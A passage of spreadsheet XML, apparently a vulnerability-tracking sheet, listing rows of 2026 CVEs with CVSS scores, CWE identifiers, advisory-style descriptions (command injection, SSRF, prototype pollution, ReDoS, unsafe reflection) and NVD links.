          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75600</t>
        </is>
      </c>
    </row>
    <row r="65">
      <c r="A65" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B65" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C65" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86530</t>
        </is>
      </c>
      <c r="D65" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E65" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F65" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G65" s="5" t="inlineStr"/>
      <c r="H65" s="5" t="inlineStr"/>
      <c r="I65" s="5" t="inlineStr"/>
      <c r="J65" s="5" t="inlineStr"/>
      <c r="K65" s="5" t="inlineStr"/>
      <c r="L65" s="5" t="inlineStr"/>
      <c r="M65" s="5" t="inlineStr"/>
      <c r="N65" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O65" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P65" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q65" s="5" t="inlineStr"/>
      <c r="R65" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S65" s="5" t="inlineStr">
        <is>
          <t>BUFFALO Wi-Fi products handle some web form input improperly to assemble command line strings internally. An administrative user may send a crafted HTTP request and execute an arbitrary OS command.</t>
        </is>
      </c>
      <c r="T65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86530</t>
        </is>
      </c>
    </row>
    <row r="66">
      <c r="A66" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B66" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C66" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87969</t>
        </is>
      </c>
      <c r="D66" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E66" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F66" s="5" t="inlineStr">
        <is>
          <t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t>
        </is>
      </c>
      <c r="G66" s="5" t="inlineStr"/>
      <c r="H66" s="5" t="inlineStr"/>
      <c r="I66" s="5" t="inlineStr"/>
      <c r="J66" s="5" t="inlineStr"/>
      <c r="K66" s="5" t="inlineStr"/>
      <c r="L66" s="5" t="inlineStr"/>
      <c r="M66" s="5" t="inlineStr"/>
      <c r="N66" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O66" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P66" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q66" s="5" t="inlineStr"/>
      <c r="R66" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S66" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in the WatchGuard AP diagnostic CLI allows an authenticated administrator to execute arbitrary operating system commands by supplying crafted input.</t>
        </is>
      </c>
      <c r="T66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87969</t>
        </is>
      </c>
    </row>
    <row r="67">
      <c r="A67" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B67" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C67" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100750</t>
        </is>
      </c>
      <c r="D67" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E67" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F67" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G67" s="5" t="inlineStr"/>
      <c r="H67" s="5" t="inlineStr"/>
      <c r="I67" s="5" t="inlineStr"/>
      <c r="J67" s="5" t="inlineStr"/>
      <c r="K67" s="5" t="inlineStr"/>
      <c r="L67" s="5" t="inlineStr"/>
      <c r="M67" s="5" t="inlineStr"/>
      <c r="N67" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O67" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P67" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q67" s="5" t="inlineStr"/>
      <c r="R67" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S67" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - LFI / SSRF in Modules Anywhere 1.5.0 - 9.0.5 for Joomla - Modules Anywhere Pro lets additional attributes on a module tag replace arbitrary parameters of the selected module. This feature is enabled by default in affected versions. The overrides are applied without checking who authored the content containing the tag. The security effect depends on how the selected module consumes the replaced parameter. Joomla's core Feed module provides a concrete affected path: its rssurl parameter is opened by the server and accepts local file: URLs as well as network URLs.</t>
        </is>
      </c>
      <c r="T67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100750</t>
        </is>
      </c>
    </row>
    <row r="68">
      <c r="A68" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B68" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C68" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101007</t>
        </is>
      </c>
      <c r="D68" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E68" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F68" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G68" s="5" t="inlineStr"/>
      <c r="H68" s="5" t="inlineStr"/>
      <c r="I68" s="5" t="inlineStr"/>
      <c r="J68" s="5" t="inlineStr"/>
      <c r="K68" s="5" t="inlineStr"/>
      <c r="L68" s="5" t="inlineStr"/>
      <c r="M68" s="5" t="inlineStr"/>
      <c r="N68" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O68" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P68" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q68" s="5" t="inlineStr"/>
      <c r="R68" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S68" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in aaPanel BaoTa up to 11.8.0. This issue affects the function InputSql of the file class/database.py of the component Database Backup Handler. Such manipulation of the argument Password leads to os command injection. The attack can be executed remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101007</t>
        </is>
      </c>
    </row>
    <row r="69">
      <c r="A69" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B69" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C69" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101008</t>
        </is>
      </c>
      <c r="D69" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E69" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F69" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G69" s="5" t="inlineStr"/>
      <c r="H69" s="5" t="inlineStr"/>
      <c r="I69" s="5" t="inlineStr"/>
      <c r="J69" s="5" t="inlineStr"/>
      <c r="K69" s="5" t="inlineStr"/>
      <c r="L69" s="5" t="inlineStr"/>
      <c r="M69" s="5" t="inlineStr"/>
      <c r="N69" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O69" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P69" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q69" s="5" t="inlineStr"/>
      <c r="R69" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S69" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in aaPanel BaoTa up to 11.8.0. Impacted is the function merge_split_file of the file /www/server/panel/class/files.py of the component File Merge Handler. Performing a manipulation of the argument split_file_path results in command injection. The attack is possible to be carried out remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101008</t>
        </is>
      </c>
    </row>
    <row r="70">
      <c r="A70" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B70" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C70" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101009</t>
        </is>
      </c>
      <c r="D70" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E70" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G70" s="5" t="inlineStr"/>
      <c r="H70" s="5" t="inlineStr"/>
      <c r="I70" s="5" t="inlineStr"/>
      <c r="J70" s="5" t="inlineStr"/>
      <c r="K70" s="5" t="inlineStr"/>
      <c r="L70" s="5" t="inlineStr"/>
      <c r="M70" s="5" t="inlineStr"/>
      <c r="N70" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O70" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P70" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q70" s="5" t="inlineStr"/>
      <c r="R70" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S70" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in aaPanel BaoTa up to 11.8.0. The affected element is the function panelTask.bt_task._unzip of the file /www/server/panel/class/panelTask.py of the component Unzip Handler. Executing a manipulation of the argument Password can lead to os command injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101009</t>
        </is>
      </c>
    </row>
    <row r="71">
      <c r="A71" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B71" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C71" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55157</t>
        </is>
      </c>
      <c r="D71" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E71" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F71" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G71" s="5" t="inlineStr"/>
      <c r="H71" s="5" t="inlineStr"/>
      <c r="I71" s="5" t="inlineStr"/>
      <c r="J71" s="5" t="inlineStr"/>
      <c r="K71" s="5" t="inlineStr"/>
      <c r="L71" s="5" t="inlineStr"/>
      <c r="M71" s="5" t="inlineStr"/>
      <c r="N71" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O71" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P71" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q71" s="5" t="inlineStr"/>
      <c r="R71" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S71" s="5" t="inlineStr">
        <is>
          <t>Token Optimizer MCP measures token savings per AI coding agent, optimizes context, and shares a live local knowledge graph across 16 CLI clients. Prior to version 5.1.0, token-optimizer-mcp is vulnerable to OS command injection in the smart_user tool. Any MCP client that can call the smart_user tool can execute arbitrary shell commands through the username argument of the get-user-info operation. The commands execute with the privileges of the user running the token-optimizer-mcp server. This issue has been patched in version 5.1.0.</t>
        </is>
      </c>
      <c r="T71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55157</t>
        </is>
      </c>
    </row>
    <row r="72">
      <c r="A72" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B72" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C72" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101073</t>
        </is>
      </c>
      <c r="D72" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E72" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G72" s="5" t="inlineStr"/>
      <c r="H72" s="5" t="inlineStr"/>
      <c r="I72" s="5" t="inlineStr"/>
      <c r="J72" s="5" t="inlineStr"/>
      <c r="K72" s="5" t="inlineStr"/>
      <c r="L72" s="5" t="inlineStr"/>
      <c r="M72" s="5" t="inlineStr"/>
      <c r="N72" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O72" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P72" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q72" s="5" t="inlineStr"/>
      <c r="R72" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S72" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Netcore NR289-GE 1.4.5102. Impacted is an unknown function of the file /bin/boa of the component CGI Dispatcher. Performing a manipulation results in improper authentication. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101073</t>
        </is>
      </c>
    </row>
    <row r="73">
      <c r="A73" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B73" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C73" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101188</t>
        </is>
      </c>
      <c r="D73" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E73" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G73" s="5" t="inlineStr"/>
      <c r="H73" s="5" t="inlineStr"/>
      <c r="I73" s="5" t="inlineStr"/>
      <c r="J73" s="5" t="inlineStr"/>
      <c r="K73" s="5" t="inlineStr"/>
      <c r="L73" s="5" t="inlineStr"/>
      <c r="M73" s="5" t="inlineStr"/>
      <c r="N73" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O73" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P73" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q73" s="5" t="inlineStr"/>
      <c r="R73" s="5" t="inlineStr">
        <is>
          <t>CWE-640</t>
        </is>
      </c>
      <c r="S73" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Netcore POWER13 2.0.240730.162638. This issue affects the function routerd.passwd_set of the file /ubus. Such manipulation leads to weak password recovery. The attack may be performed from remote. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101188</t>
        </is>
      </c>
    </row>
    <row r="74">
      <c r="A74" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B74" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C74" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101909</t>
        </is>
      </c>
      <c r="D74" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E74" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F74" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G74" s="5" t="inlineStr"/>
      <c r="H74" s="5" t="inlineStr"/>
      <c r="I74" s="5" t="inlineStr"/>
      <c r="J74" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K74" s="5" t="inlineStr"/>
      <c r="L74" s="5" t="inlineStr"/>
      <c r="M74" s="5" t="inlineStr"/>
      <c r="N74" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O74" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P74" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q74" s="5" t="inlineStr"/>
      <c r="R74" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S74" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 0.28.0 until 0.34.0 and 1.15.1 until 1.20.0, ToFormData processes inherited serialization options and visitor properties supplied through prototype pollution. A separate same-process prototype-pollution flaw supplies inherited dots, indexes, metaTokens, maxDepth, visitor, or Blob values before object serialization. The inherited options alter toFormData field naming and data interpretation, maxDepth can force request failure, Blob changes value handling, and a polluted visitor can execute when an attacker already has the stronger ability to inject a function. Serialized field naming and data interpretation can change, maxDepth can cause request failure, Blob can alter value handling, and a polluted visitor can execute under the stronger function-injection primitive. This issue is fixed in versions 0.34.0 and 1.20.0.</t>
        </is>
      </c>
      <c r="T74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101909</t>
        </is>
      </c>
    </row>
    <row r="75">
      <c r="A75" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B75" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C75" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81375</t>
        </is>
      </c>
      <c r="D75" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E75" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F75" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G75" s="5" t="inlineStr"/>
      <c r="H75" s="5" t="inlineStr"/>
      <c r="I75" s="5" t="inlineStr"/>
      <c r="J75" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K75" s="5" t="inlineStr"/>
      <c r="L75" s="5" t="inlineStr"/>
      <c r="M75" s="5" t="inlineStr"/>
      <c r="N75" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O75" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P75" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q75" s="5" t="inlineStr"/>
      <c r="R75" s="5" t="inlineStr">
        <is>
          <t>CWE-610</t>
        </is>
      </c>
      <c r="S75" s="5" t="inlineStr">
        <is>
          <t>A Confused Deputy vulnerability in the EmailTask component in Google Cloud Application Integration versions prior to 2026-06-30 on Google Cloud Platform allows an authenticated attacker to read and exfiltrate arbitrary Google-internal files via a crafted attachment file path.
This vulnerability was patched on 30 June 2026, and no customer action is needed.</t>
        </is>
      </c>
      <c r="T75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81375</t>
        </is>
      </c>
    </row>
    <row r="76">
      <c r="A76" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B76" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C76" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101292</t>
        </is>
      </c>
      <c r="D76" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E76" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F76" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G76" s="5" t="inlineStr"/>
      <c r="H76" s="5" t="inlineStr"/>
      <c r="I76" s="5" t="inlineStr"/>
      <c r="J76" s="5" t="inlineStr"/>
      <c r="K76" s="5" t="inlineStr"/>
      <c r="L76" s="5" t="inlineStr"/>
      <c r="M76" s="5" t="inlineStr"/>
      <c r="N76" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O76" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P76" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q76" s="5" t="inlineStr"/>
      <c r="R76" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="S76" s="5" t="inlineStr">
        <is>
          <t>Apache ActiveMQ Artemis before 2.34.0 contains an unsafe reflection vulnerability in FederationStreamConnectMessage.getFederationPolicy(). The method calls Class.forName(clazz).getConstructor().newInstance() where clazz is read directly from the CORE protocol wire buffer without type validation. An authenticated federation peer can send a FEDERATION_DOWNSTREAM_CONNECT packet with a crafted class name, causing the broker to load and instantiate arbitrary classes visible to the Artemis module classloader. Static initializers (&lt;clinit&gt;) and no-argument constructors (&lt;init&gt;()) execute as side effects before the type cast, enabling denial of service via system-property poisoning, out-of-memory conditions via classloading, or broker state manipulation.</t>
        </is>
      </c>
      <c r="T76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101292</t>
        </is>
      </c>
    </row>
    <row r="77">
      <c r="A77" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B77" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C77" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101901</t>
        </is>
      </c>
      <c r="D77" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E77" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F77" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G77" s="5" t="inlineStr"/>
      <c r="H77" s="5" t="inlineStr"/>
      <c r="I77" s="5" t="inlineStr"/>
      <c r="J77" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K77" s="5" t="inlineStr"/>
      <c r="L77" s="5" t="inlineStr"/>
      <c r="M77" s="5" t="inlineStr"/>
      <c r="N77" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O77" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P77" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q77" s="5" t="inlineStr"/>
      <c r="R77" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S77" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.13.0 until 1.20.0, Http2Sessions does not install adequate error handling for a ClientHttp2Session during Axios HTTP/2 session initialization or reuse. A request uses httpVersion: 2 and the ClientHttp2Session emits an error during session initialization or reuse. The unhandled session error escapes normal Promise rejection handling. The uncaught error can terminate the Node.js process and cause denial of service. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101901</t>
        </is>
      </c>
    </row>
    <row r="78">
      <c r="A78" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B78" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C78" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101903</t>
        </is>
      </c>
      <c r="D78" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E78" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F78" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G78" s="5" t="inlineStr"/>
      <c r="H78" s="5" t="inlineStr"/>
      <c r="I78" s="5" t="inlineStr"/>
      <c r="J78" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, express, gin</t>
        </is>
      </c>
      <c r="K78" s="5" t="inlineStr"/>
      <c r="L78" s="5" t="inlineStr"/>
      <c r="M78" s="5" t="inlineStr"/>
      <c r="N78" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O78" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P78" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q78" s="5" t="inlineStr"/>
      <c r="R78" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="S78" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.16.1 until 1.20.0, the RFC 2397 regular expression allows slash characters on both sides of the media-type separator. An application passes an attacker-controlled malformed data URL containing many slash characters and no comma. the JavaScript regular-expression engine explores many separator placements before rejecting the URL. Synchronous excessive backtracking can block the Node.js event loop and cause denial of service. The affected identifiers are fromDataURI, DATA_URL_PATTERN, data:. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101903</t>
        </is>
      </c>
    </row>
    <row r="79">
      <c r="A79" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B79" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C79" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101906</t>
        </is>
      </c>
      <c r="D79" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E79" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F79" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G79" s="5" t="inlineStr"/>
      <c r="H79" s="5" t="inlineStr"/>
      <c r="I79" s="5" t="inlineStr"/>
      <c r="J79" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, express</t>
        </is>
      </c>
      <c r="K79" s="5" t="inlineStr"/>
      <c r="L79" s="5" t="inlineStr"/>
      <c r="M79" s="5" t="inlineStr"/>
      <c r="N79" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O79" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P79" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q79" s="5" t="inlineStr"/>
      <c r="R79" s="5" t="inlineStr">
        <is>
          <t>CWE-1333, CWE-400</t>
        </is>
      </c>
      <c r="S79" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.15.0 until 1.20.0, Axios shouldBypassProxy applies a quadratic trailing-dot regular expression to redirect hostnames. HTTP_PROXY or HTTPS_PROXY is configured, NO_PROXY or no_proxy is non-empty, redirects are followed, and a crafted redirect Location contains many dots followed by a non-dot character. Hostname.replace(/.+$/, '') backtracks quadratically while processing the crafted redirect hostname. Synchronous regular-expression processing can block the Node.js event loop and cause denial of service. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101906</t>
        </is>
      </c>
    </row>
    <row r="80">
      <c r="A80" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B80" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C80" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54160</t>
        </is>
      </c>
      <c r="D80" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E80" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F80" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
